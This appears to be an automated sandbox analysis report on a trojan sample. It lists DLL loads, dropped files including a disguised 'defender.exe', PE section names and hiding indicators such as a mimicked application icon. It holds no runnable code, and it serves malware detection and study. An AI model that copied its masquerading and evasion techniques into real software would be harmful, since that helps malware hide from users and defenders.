Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dcomp.dll
Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic file information: File size 69484987 > 1048576
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: .voltbl
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: .voltbl
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: defender.exe.0.drStatic PE information: section name: .00cfg
Source: defender.exe.0.drStatic PE information: section name: .gxfg
Source: defender.exe.0.drStatic PE information: section name: .retplne
Source: defender.exe.0.drStatic PE information: section name: .rodata
Source: defender.exe.0.drStatic PE information: section name: .voltbl
Source: defender.exe.0.drStatic PE information: section name: CPADinfo
Source: defender.exe.0.drStatic PE information: section name: LZMADEC
Source: defender.exe.0.drStatic PE information: section name: _RDATA
Source: defender.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: .voltbl
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: .voltbl
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: .voltbl
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: .voltbl
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: defender.exe0.0.drStatic PE information: section name: .00cfg
Source: defender.exe0.0.drStatic PE information: section name: .gxfg
Source: defender.exe0.0.drStatic PE information: section name: .retplne
Source: defender.exe0.0.drStatic PE information: section name: .rodata
Source: defender.exe0.0.drStatic PE information: section name: .voltbl
Source: defender.exe0.0.drStatic PE information: section name: CPADinfo
Source: defender.exe0.0.drStatic PE information: section name: LZMADEC
Source: defender.exe0.0.drStatic PE information: section name: _RDATA
Source: defender.exe0.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll0.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: .voltbl
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: 31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node.12.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFAAB7D00AD pushad ; iretd 23_2_00007FFAAB7D00C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\defender.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile created: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\ffmpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile created: C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SpellingJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
